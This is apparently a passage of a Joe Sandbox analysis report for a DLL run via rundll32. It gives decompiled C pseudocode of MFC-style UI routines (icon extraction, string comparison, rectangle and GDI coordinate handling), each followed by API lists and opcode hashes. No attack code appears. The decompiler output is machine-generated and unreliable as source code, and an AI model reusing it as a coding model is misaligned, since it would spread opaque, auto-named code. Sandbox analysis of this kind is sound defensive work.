                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 6,  *((intOrPtr*)(_t152 + 8)));
                                                                                                        					E100351EC(0, _t151, _t145, _t152, __eflags, 7,  *((intOrPtr*)(_t152 + 0x20)));
                                                                                                        					E10001DB0(_t152 + 0xc, E10007F7E());
                                                                                                        					_t78 =  *(_t152 + 0x24);
                                                                                                        					__eflags = _t78;
                                                                                                        					 *((char*)(_t152 - 4)) = 2;
                                                                                                        					if(_t78 == 0) {
                                                                                                        						L9:
                                                                                                        						E100025A0(_t149,  *((intOrPtr*)(_t152 + 0x20)));
                                                                                                        						_t80 = E10035316(_t152 + 0xc, 0x28, 0);
                                                                                                        						__eflags = _t80 - 0xffffffff;
                                                                                                        						_t127 = _t152 + 0xc;
                                                                                                        						if(_t80 == 0xffffffff) {
                                                                                                        							L12:
                                                                                                        							E10002500(_t127);
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        						_push(E10006AA0(_t152 + 0x20, _t80 + 1));
                                                                                                        						 *((char*)(_t152 - 4)) = 3;
                                                                                                        						E10006E40(_t152 + 0xc);
                                                                                                        						 *((char*)(_t152 - 4)) = 2;
                                                                                                        						E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                        						_t94 = E10035316(_t152 + 0xc, 0x2e, 0);
                                                                                                        						__eflags = _t94 - 0xffffffff;
                                                                                                        						_t127 = _t152 + 0xc;
                                                                                                        						if(_t94 == 0xffffffff) {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						_push(E10006AA0(_t152 + 0x20, _t94));
                                                                                                        						 *((char*)(_t152 - 4)) = 4;
                                                                                                        						E10006E40(_t152 + 0xc);
                                                                                                        						 *((char*)(_t152 - 4)) = 2;
                                                                                                        						E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                        						_t99 = E10035316(_t152 + 0xc, 0x29, 0);
                                                                                                        						__eflags = _t99 - 0xffffffff;
                                                                                                        						_t127 = _t152 + 0xc;
                                                                                                        						if(_t99 != 0xffffffff) {
                                                                                                        							_push(E10006AD0(_t152 + 0x20, _t99));
                                                                                                        							 *((char*)(_t152 - 4)) = 5;
                                                                                                        							E10006E40(_t152 + 0xc);
                                                                                                        							__eflags =  *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0;
                                                                                                        							E10001280( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					} else {
                                                                                                        						__eflags = _t78->i;
                                                                                                        						if(_t78->i == 0) {
                                                                                                        							goto L9;
                                                                                                        						}
                                                                                                        						E100025A0(_t149, _t78);
                                                                                                        						L14:
                                                                                                        						_t112 =  *(_t152 + 0xc);
                                                                                                        						E100351EC(_t112, _t151, _t145, _t152, __eflags, 8, _t112);
                                                                                                        						_t51 = _t112 - 0x10; // -16
                                                                                                        						E10001280(_t51, _t145);
                                                                                                        						E10001280(_t149 - 0x10, _t145);
                                                                                                        						E10001280( &(( *(_t152 - 0x10))[0xfffffffffffffff0]), _t145);
                                                                                                        						_t87 = 1;
                                                                                                        						__eflags = 1;
                                                                                                        						L15:
                                                                                                        						return E1003EF21(_t87);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t87 = 0;
                                                                                                        				goto L15;
                                                                                                        			}














                                                                                                        0x10035709
                                                                                                        0x1003570d
                                                                                                        0x10035718
                                                                                                        0x1003571c
                                                                                                        0x10035727
                                                                                                        0x1003572c
                                                                                                        0x1003572f
                                                                                                        0x10035732
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003573e
                                                                                                        0x10035742
                                                                                                        0x10035746
                                                                                                        0x10035751
                                                                                                        0x10035755
                                                                                                        0x10035760
                                                                                                        0x10035765
                                                                                                        0x10035768
                                                                                                        0x1003576b
                                                                                                        0x1003577e
                                                                                                        0x10035782
                                                                                                        0x10035786
                                                                                                        0x1003578e
                                                                                                        0x10035791
                                                                                                        0x00000000
                                                                                                        0x10035791
                                                                                                        0x00000000
                                                                                                        0x100356ca
                                                                                                        0x100356ca
                                                                                                        0x100356cc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100356d2
                                                                                                        0x10035796
                                                                                                        0x10035796
                                                                                                        0x1003579e
                                                                                                        0x100357a3
                                                                                                        0x100357a6
                                                                                                        0x100357ae
                                                                                                        0x100357b9
                                                                                                        0x100357c0
                                                                                                        0x100357c0
                                                                                                        0x100357c1
                                                                                                        0x100357c6
                                                                                                        0x100357c6
                                                                                                        0x100356c8
                                                                                                        0x100355c7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 100355A5
                                                                                                        • StringFromCLSID.OLE32(00000000,?,00000008,100358E2,?,?,00000000,?,?,00000000,00000000,00000000,0000000A,00000008,10028965), ref: 100355B1
                                                                                                          • Part of subcall function 1002AC64: CoTaskMemFree.OLE32(?,00000000,100355BF,?,?,?,?,?,?,00000000,00000000), ref: 1002AC75
                                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 100355E7
                                                                                                        • ExtractIconA.SHELL32(?,00000000,?), ref: 10035671
                                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,00000000,00000000), ref: 1003567C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeIconTask$DestroyExtractFromH_prolog3String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2818569797-0
                                                                                                        • Opcode ID: 0ba7340fa8f91b31ad85c115f08953dca0ffc2acd6fe494c9afa468dbd9543fc
                                                                                                        • Instruction ID: f2acac351f5096b2c127d7cff4df37ed17ab9ecce8ccf1ff20177b1ffcb83c7c
                                                                                                        • Opcode Fuzzy Hash: 0ba7340fa8f91b31ad85c115f08953dca0ffc2acd6fe494c9afa468dbd9543fc
                                                                                                        • Instruction Fuzzy Hash: 73515079500148AFDB06EFA0CC96EEE3B69EF05396F104219F9166B1E2DF35BA04C761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1002332D(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
                                                                                                        				signed int _t81;
                                                                                                        				intOrPtr _t83;
                                                                                                        				void* _t89;
                                                                                                        				intOrPtr _t94;
                                                                                                        				CHAR** _t96;
                                                                                                        				signed int _t99;
                                                                                                        				signed int _t101;
                                                                                                        				signed int _t106;
                                                                                                        				intOrPtr _t108;
                                                                                                        				CHAR** _t115;
                                                                                                        				int _t118;
                                                                                                        				CHAR** _t120;
                                                                                                        				int _t123;
                                                                                                        				signed int _t124;
                                                                                                        				void* _t128;
                                                                                                        				void* _t133;
                                                                                                        				void* _t146;
                                                                                                        				signed int _t148;
                                                                                                        				void* _t150;
                                                                                                        				signed short* _t154;
                                                                                                        
                                                                                                        				_t149 = __esi;
                                                                                                        				_t146 = __edx;
                                                                                                        				_t129 = __ecx;
                                                                                                        				_push(0x188);
                                                                                                        				E1003EE82(0x100550c7, __ebx, __edi, __esi);
                                                                                                        				_t128 = __ecx;
                                                                                                        				_t148 = 0;
                                                                                                        				 *(_t150 - 0x10) = 0;
                                                                                                        				if( *((intOrPtr*)(_t150 + 8)) != 0) {
                                                                                                        					L29:
                                                                                                        					_push(_t148);
                                                                                                        					_push(0x14000c);
                                                                                                        					_push(1);
                                                                                                        					E100252DF(_t128, _t150 - 0x194, _t148, _t149, __eflags);
                                                                                                        					 *(_t150 - 4) = 3;
                                                                                                        					E1002554D(_t150 - 0x194);
                                                                                                        					_t81 =  *(_t128 + 0x70);
                                                                                                        					__eflags = _t81 - _t148;
                                                                                                        					if(_t81 != _t148) {
                                                                                                        						E100297B1(_t81);
                                                                                                        					}
                                                                                                        					_t82 =  *(_t128 + 0x74);
                                                                                                        					__eflags =  *(_t128 + 0x74) - _t148;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						E100297B1(_t82);
                                                                                                        					}
                                                                                                        					_t83 =  *((intOrPtr*)(_t150 - 0x120));
                                                                                                        					 *(_t128 + 0x70) =  *(_t83 + 8);
                                                                                                        					 *(_t128 + 0x74) =  *(_t83 + 0xc);
                                                                                                        					_t133 = _t150 - 0x194;
                                                                                                        					L34:
                                                                                                        					 *(_t150 - 4) =  *(_t150 - 4) | 0xffffffff;
                                                                                                        					_t85 = E100099E7(_t133, _t148, _t149,  *(_t150 - 4));
                                                                                                        					L35:
                                                                                                        					return E1003EF21(_t85);
                                                                                                        				}
                                                                                                        				_t89 =  *(__ecx + 0x74);
                                                                                                        				if(_t89 == 0) {
                                                                                                        					goto L29;
                                                                                                        				}
                                                                                                        				_t149 = GlobalLock(_t89);
                                                                                                        				_t154 = _t149;
                                                                                                        				_t85 = 0 | _t154 == 0x00000000;
                                                                                                        				_t155 = _t154 == 0;
                                                                                                        				if(_t154 == 0) {
                                                                                                        					_t85 = E1000836F(_t128, _t129, 0, _t149, _t155);
                                                                                                        				}
                                                                                                        				_t156 = _t149[3] & 0x00000001;
                                                                                                        				if((_t149[3] & 0x00000001) == 0) {
                                                                                                        					goto L35;
                                                                                                        				}
                                                                                                        				_push(_t148);
                                                                                                        				_push(0x14000c);
                                                                                                        				_push(1);
                                                                                                        				E100252DF(_t128, _t150 - 0xd8, _t148, _t149, _t156);
                                                                                                        				 *(_t150 - 4) = _t148;
                                                                                                        				if(E1002554D(_t150 - 0xd8) != 0) {
                                                                                                        					_t94 =  *((intOrPtr*)(_t150 - 0x64));
                                                                                                        					__eflags =  *((intOrPtr*)(_t94 + 0xc)) - _t148;
                                                                                                        					if( *((intOrPtr*)(_t94 + 0xc)) != _t148) {
                                                                                                        						_t96 = E10025560(_t150 - 0xd8, _t150 - 0x18);
                                                                                                        						_t148 = lstrcmpA;
                                                                                                        						 *(_t150 - 4) = 1;
                                                                                                        						 *(_t150 - 0x10) = 1;
                                                                                                        						_t99 = lstrcmpA(_t149 + ( *_t149 & 0x0000ffff),  *_t96);
                                                                                                        						__eflags = _t99;
                                                                                                        						if(_t99 != 0) {
                                                                                                        							L14:
                                                                                                        							 *((char*)(_t150 + 0xb)) = 1;
                                                                                                        							L15:
                                                                                                        							__eflags =  *(_t150 - 0x10) & 0x00000004;
                                                                                                        							if(( *(_t150 - 0x10) & 0x00000004) != 0) {
                                                                                                        								 *(_t150 - 0x10) =  *(_t150 - 0x10) & 0xfffffffb;
                                                                                                        								__eflags =  *((intOrPtr*)(_t150 - 0x1c)) + 0xfffffff0;
                                                                                                        								E10001280( *((intOrPtr*)(_t150 - 0x1c)) + 0xfffffff0, _t146);
                                                                                                        							}
                                                                                                        							__eflags =  *(_t150 - 0x10) & 0x00000002;
                                                                                                        							if(( *(_t150 - 0x10) & 0x00000002) != 0) {
                                                                                                        								 *(_t150 - 0x10) =  *(_t150 - 0x10) & 0xfffffffd;
                                                                                                        								__eflags =  *((intOrPtr*)(_t150 - 0x14)) + 0xfffffff0;
                                                                                                        								E10001280( *((intOrPtr*)(_t150 - 0x14)) + 0xfffffff0, _t146);
                                                                                                        							}
                                                                                                        							 *(_t150 - 4) =  *(_t150 - 4) & 0x00000000;
                                                                                                        							__eflags =  *(_t150 - 0x10) & 0x00000001;
                                                                                                        							if(( *(_t150 - 0x10) & 0x00000001) != 0) {
                                                                                                        								__eflags =  *((intOrPtr*)(_t150 - 0x18)) + 0xfffffff0;
                                                                                                        								E10001280( *((intOrPtr*)(_t150 - 0x18)) + 0xfffffff0, _t146);
                                                                                                        							}
                                                                                                        							__eflags =  *((char*)(_t150 + 0xb));
                                                                                                        							if( *((char*)(_t150 + 0xb)) == 0) {
                                                                                                        								_t101 =  *( *((intOrPtr*)(_t150 - 0x64)) + 8);
                                                                                                        								__eflags = _t101;
                                                                                                        								if(_t101 != 0) {
                                                                                                        									E100297B1(_t101);
                                                                                                        								}
                                                                                                        								_t103 =  *( *((intOrPtr*)(_t150 - 0x64)) + 0xc);
                                                                                                        								__eflags =  *( *((intOrPtr*)(_t150 - 0x64)) + 0xc);
                                                                                                        								if(__eflags != 0) {
                                                                                                        									E100297B1(_t103);
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								_t106 =  *(_t128 + 0x70);
                                                                                                        								__eflags = _t106;
                                                                                                        								if(_t106 != 0) {
                                                                                                        									E100297B1(_t106);
                                                                                                        								}
                                                                                                        								E100297B1( *(_t128 + 0x74));
                                                                                                        								_t108 =  *((intOrPtr*)(_t150 - 0x64));
                                                                                                        								 *(_t128 + 0x70) =  *(_t108 + 8);
                                                                                                        								 *(_t128 + 0x74) =  *(_t108 + 0xc);
                                                                                                        							}
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        						_t115 = E10025591(_t150 - 0xd8, _t150 - 0x14);
                                                                                                        						 *(_t150 - 4) = 2;
                                                                                                        						 *(_t150 - 0x10) = 3;
                                                                                                        						_t118 = lstrcmpA(_t149 + (_t149[1] & 0x0000ffff),  *_t115);
                                                                                                        						__eflags = _t118;
                                                                                                        						if(_t118 != 0) {
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        						_t120 = E100255C3(_t150 - 0xd8, _t150 - 0x1c);
                                                                                                        						 *(_t150 - 0x10) = 7;
                                                                                                        						_t123 = lstrcmpA(_t149 + (_t149[2] & 0x0000ffff),  *_t120);
                                                                                                        						__eflags = _t123;
                                                                                                        						 *((char*)(_t150 + 0xb)) = 0;
                                                                                                        						if(_t123 == 0) {
                                                                                                        							goto L15;
                                                                                                        						}
                                                                                                        						goto L14;
                                                                                                        					}
                                                                                                        					_t124 =  *(_t128 + 0x70);
                                                                                                        					__eflags = _t124 - _t148;
                                                                                                        					if(_t124 != _t148) {
                                                                                                        						E100297B1(_t124);
                                                                                                        					}
                                                                                                        					E100297B1( *(_t128 + 0x74));
                                                                                                        					 *(_t128 + 0x70) = _t148;
                                                                                                        					 *(_t128 + 0x74) = _t148;
                                                                                                        				}
                                                                                                        				L6:
                                                                                                        				_t133 = _t150 - 0xd8;
                                                                                                        				goto L34;
                                                                                                        			}
























                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10023337
                                                                                                        • GlobalLock.KERNEL32 ref: 10023358
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 100233F7
                                                                                                        • lstrcmpA.KERNEL32(?,00000000,?), ref: 10023423
                                                                                                        • lstrcmpA.KERNEL32(?,00000000,?), ref: 10023448
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 569107404-0
                                                                                                        • Opcode ID: 2f6e357e834fda0ac90e369ab9a1ec54d2ff6938a07329c3e7fb7dbdc46fb7b3
                                                                                                        • Instruction ID: d605c4bb8609d9c7ac57807ca87a441f901d374d81bba1cd389bd398f9b1ccbb
                                                                                                        • Opcode Fuzzy Hash: 2f6e357e834fda0ac90e369ab9a1ec54d2ff6938a07329c3e7fb7dbdc46fb7b3
                                                                                                        • Instruction Fuzzy Hash: 0561A0749003159FDB02DF64DC95BADB7F5EF00394F908689E859AB2A6DB70EE84CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E10023AD4(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				char _v12;
                                                                                                        				int _v20;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t46;
                                                                                                        				int _t48;
                                                                                                        				int _t50;
                                                                                                        				signed int _t57;
                                                                                                        				int _t71;
                                                                                                        				void* _t73;
                                                                                                        				signed int _t74;
                                                                                                        				signed int _t76;
                                                                                                        				signed int _t77;
                                                                                                        				int _t78;
                                                                                                        				signed int _t85;
                                                                                                        				int _t88;
                                                                                                        				signed int _t95;
                                                                                                        				void* _t97;
                                                                                                        				void* _t98;
                                                                                                        				struct tagRECT* _t100;
                                                                                                        
                                                                                                        				_t85 = _a4 * 0x28;
                                                                                                        				_t97 = __ecx;
                                                                                                        				_t98 = _t85 +  *((intOrPtr*)(__ecx + 0xb0));
                                                                                                        				E10023A59(__ecx, __edx, __eflags,  &_v12);
                                                                                                        				_t88 =  *(_t98 + 0x24);
                                                                                                        				_t95 = 0 |  *(_t98 + 0x20) - _t88 < 0x00000000;
                                                                                                        				_t46 =  *((intOrPtr*)(__ecx + 0x10c));
                                                                                                        				if(_t46 == 0) {
                                                                                                        					 *(_t98 + 0x18) =  *(_t98 + 0x20);
                                                                                                        					_t48 =  *(_t98 + 0x24);
                                                                                                        					goto L12;
                                                                                                        				} else {
                                                                                                        					_t73 = _t46 - 1;
                                                                                                        					if(_t73 == 0) {
                                                                                                        						__eflags = _t95;
                                                                                                        						 *(_t98 + 0x1c) = _t88;
                                                                                                        						_t74 =  *(_t98 + 0x20);
                                                                                                        						if(_t95 == 0) {
                                                                                                        							_t76 = _t74 * 3 - _t88;
                                                                                                        							__eflags = _t76;
                                                                                                        						} else {
                                                                                                        							_t76 = _t74 + _t88;
                                                                                                        						}
                                                                                                        						asm("cdq");
                                                                                                        						_t77 = _t76 - _t95;
                                                                                                        						__eflags = _t77;
                                                                                                        						_t78 = _t77 >> 1;
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						if(_t73 == 1) {
                                                                                                        							if(_t95 == 0) {
                                                                                                        								 *(_t98 + 0x1c) = _t88;
                                                                                                        								_t78 =  *(_t98 + 0x20) +  *(_t98 + 0x20) -  *(_t98 + 0x24);
                                                                                                        								L10:
                                                                                                        								 *(_t98 + 0x18) = _t78;
                                                                                                        							} else {
                                                                                                        								_t48 = 1;
                                                                                                        								 *(_t98 + 0x18) = 1;
                                                                                                        								L12:
                                                                                                        								 *(_t98 + 0x1c) = _t48;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_v20 = MulDiv( *(_t98 + 0x10),  *(_t98 + 0x18),  *(_t98 + 0x1c));
                                                                                                        				_t50 = MulDiv( *(_t98 + 0x14),  *(_t98 + 0x18),  *(_t98 + 0x1c));
                                                                                                        				_t100 =  *((intOrPtr*)(_t97 + 0xb0)) + _t85;
                                                                                                        				SetRect(_t100, 8, 8, _v20 + 0xb, _t50 + 0xb);
                                                                                                        				if( *((intOrPtr*)(_t97 + 0x10c)) != 0) {
                                                                                                        					_push(0x1005e2e8);
                                                                                                        					_push( &_v12);
                                                                                                        					_push(_t100->bottom - _t100->top + 0x10);
                                                                                                        					_t57 = _t100->right - _t100->left + 0x10;
                                                                                                        					__eflags = _t57;
                                                                                                        					_push(_t57);
                                                                                                        					_push(1);
                                                                                                        					return E100332F3(_t85, _t97, _t97, _t100, _t57);
                                                                                                        				}
                                                                                                        				asm("cdq");
                                                                                                        				asm("cdq");
                                                                                                        				_t71 = OffsetRect(_t100, (_t100->left - _t100->right + _v12 - _t95 >> 1) - 1, (_t100->top - _t100->bottom + _v8 - _t95 >> 1) - 1);
                                                                                                        				if(_a4 == 1) {
                                                                                                        					return OffsetRect(_t100,  *(_t97 + 0x11c), 0);
                                                                                                        				}
                                                                                                        				return _t71;
                                                                                                        			}



























                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Offset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3858320380-0
                                                                                                        • Opcode ID: c682565cb4de917052e743f99ea10065266852cd23b399b94ce28ed69b40e940
                                                                                                        • Instruction ID: 9087e05f941062063cf6555c63204954d934a2a51f05fe36132e05c803bd4650
                                                                                                        • Opcode Fuzzy Hash: c682565cb4de917052e743f99ea10065266852cd23b399b94ce28ed69b40e940
                                                                                                        • Instruction Fuzzy Hash: BF415D71600A06AFD725CF69CD85A9ABBF5FF08300F448A18EA8AD7A51D730F945CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100332F3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				struct tagPOINT* _t75;
                                                                                                        				long* _t77;
                                                                                                        				long* _t80;
                                                                                                        				struct tagPOINT* _t81;
                                                                                                        				signed int _t83;
                                                                                                        				signed int _t84;
                                                                                                        				signed int _t85;
                                                                                                        				signed int _t89;
                                                                                                        				signed int _t90;
                                                                                                        				signed int _t91;
                                                                                                        				signed int _t92;
                                                                                                        				struct tagPOINT* _t97;
                                                                                                        				signed int _t98;
                                                                                                        				signed int _t107;
                                                                                                        				void* _t115;
                                                                                                        				signed int _t117;
                                                                                                        				signed int _t118;
                                                                                                        				void* _t120;
                                                                                                        				void* _t121;
                                                                                                        				void* _t122;
                                                                                                        
                                                                                                        				_t122 = __eflags;
                                                                                                        				_push(0x18);
                                                                                                        				E1003EE82(0x100560ee, __ebx, __edi, __esi);
                                                                                                        				_t120 = __ecx;
                                                                                                        				 *(_t121 - 0x10) =  *(__ecx + 0x5c);
                                                                                                        				 *(__ecx + 0x5c) =  *(_t121 + 8);
                                                                                                        				 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t121 + 0xc));
                                                                                                        				_push(0);
                                                                                                        				 *((intOrPtr*)(__ecx + 0x64)) =  *((intOrPtr*)(_t121 + 0x10));
                                                                                                        				E10009091(__ebx, _t121 - 0x24, __edi, __ecx, _t122);
                                                                                                        				 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
                                                                                                        				E100086A2(_t121 - 0x24,  *((intOrPtr*)(_t120 + 0x5c)));
                                                                                                        				_t115 = LPtoDP;
                                                                                                        				_t75 = _t120 + 0x68;
                                                                                                        				_t75->x =  *(_t120 + 0x60);
                                                                                                        				_t75->y =  *(_t120 + 0x64);
                                                                                                        				LPtoDP( *(_t121 - 0x1c), _t75, 1);
                                                                                                        				_t77 =  *(_t121 + 0x14);
                                                                                                        				_t97 = _t120 + 0x70;
                                                                                                        				_t97->x =  *_t77;
                                                                                                        				_t97->y = _t77[1];
                                                                                                        				LPtoDP( *(_t121 - 0x1c), _t97, 1);
                                                                                                        				_t80 =  *(_t121 + 0x18);
                                                                                                        				_t81 = _t120 + 0x78;
                                                                                                        				_t81->x =  *_t80;
                                                                                                        				_t81->y = _t80[1];
                                                                                                        				LPtoDP( *(_t121 - 0x1c), _t81, 1);
                                                                                                        				_t83 =  *(_t120 + 0x6c);
                                                                                                        				if(_t83 < 0) {
                                                                                                        					 *(_t120 + 0x6c) =  ~_t83;
                                                                                                        				}
                                                                                                        				_t84 =  *(_t120 + 0x74);
                                                                                                        				if(_t84 < 0) {
                                                                                                        					 *(_t120 + 0x74) =  ~_t84;
                                                                                                        				}
                                                                                                        				_t85 =  *(_t120 + 0x7c);
                                                                                                        				_t125 = _t85;
                                                                                                        				if(_t85 < 0) {
                                                                                                        					 *(_t120 + 0x7c) =  ~_t85;
                                                                                                        				}
                                                                                                        				 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
                                                                                                        				_t86 = E100090E5(_t97, _t121 - 0x24, _t115, _t120, _t125);
                                                                                                        				_t107 = 0xa;
                                                                                                        				if(_t97->x == 0) {
                                                                                                        					_t92 =  *(_t120 + 0x68);
                                                                                                        					asm("cdq");
                                                                                                        					_t118 = _t107;
                                                                                                        					_t86 = _t92 / _t118;
                                                                                                        					_t97->x = _t92 / _t118;
                                                                                                        				}
                                                                                                        				if( *(_t120 + 0x74) == 0) {
                                                                                                        					_t91 =  *(_t120 + 0x6c);
                                                                                                        					asm("cdq");
                                                                                                        					_t117 = _t107;
                                                                                                        					_t86 = _t91 / _t117;
                                                                                                        					 *(_t120 + 0x74) = _t91 / _t117;
                                                                                                        				}
                                                                                                        				if( *(_t120 + 0x78) == 0) {
                                                                                                        					_t90 = _t97->x;
                                                                                                        					asm("cdq");
                                                                                                        					_t98 = _t107;
                                                                                                        					_t86 = _t90 / _t98;
                                                                                                        					 *(_t120 + 0x78) = _t90 / _t98;
                                                                                                        				}
                                                                                                        				if( *(_t120 + 0x7c) == 0) {
                                                                                                        					_t89 =  *(_t120 + 0x74);
                                                                                                        					asm("cdq");
                                                                                                        					_t86 = _t89 / _t107;
                                                                                                        					 *(_t120 + 0x7c) = _t89 / _t107;
                                                                                                        				}
                                                                                                        				if( *(_t120 + 0x20) != 0) {
                                                                                                        					E10032C01(_t120);
                                                                                                        					_t86 =  *(_t121 - 0x10);
                                                                                                        					if( *(_t121 - 0x10) !=  *((intOrPtr*)(_t120 + 0x5c))) {
                                                                                                        						_t86 = InvalidateRect( *(_t120 + 0x20), 0, 1);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E1003EF21(_t86);
                                                                                                        			}























                                                                                                        0x100333d6
                                                                                                        0x100333d8
                                                                                                        0x100333da
                                                                                                        0x100333db
                                                                                                        0x100333dd
                                                                                                        0x100333df
                                                                                                        0x100333df
                                                                                                        0x100333e5
                                                                                                        0x100333e7
                                                                                                        0x100333ea
                                                                                                        0x100333eb
                                                                                                        0x100333ed
                                                                                                        0x100333ed
                                                                                                        0x100333f3
                                                                                                        0x100333f7
                                                                                                        0x100333fc
                                                                                                        0x10033402
                                                                                                        0x1003340a
                                                                                                        0x1003340a
                                                                                                        0x10033402
                                                                                                        0x10033415

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 100332FA
                                                                                                          • Part of subcall function 10009091: __EH_prolog3.LIBCMT ref: 10009098
                                                                                                          • Part of subcall function 10009091: GetWindowDC.USER32(00000000,00000004,10033323,00000000,00000018,10023BFF,00000001,?,?,?,1005E2E8), ref: 100090C4
                                                                                                          • Part of subcall function 100086A2: SetMapMode.GDI32(?,?), ref: 100086BB
                                                                                                          • Part of subcall function 100086A2: SetMapMode.GDI32(?,?), ref: 100086C9
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 1003334C
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 10033364
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 1003337C
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1003340A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Mode$InvalidateRectWindow
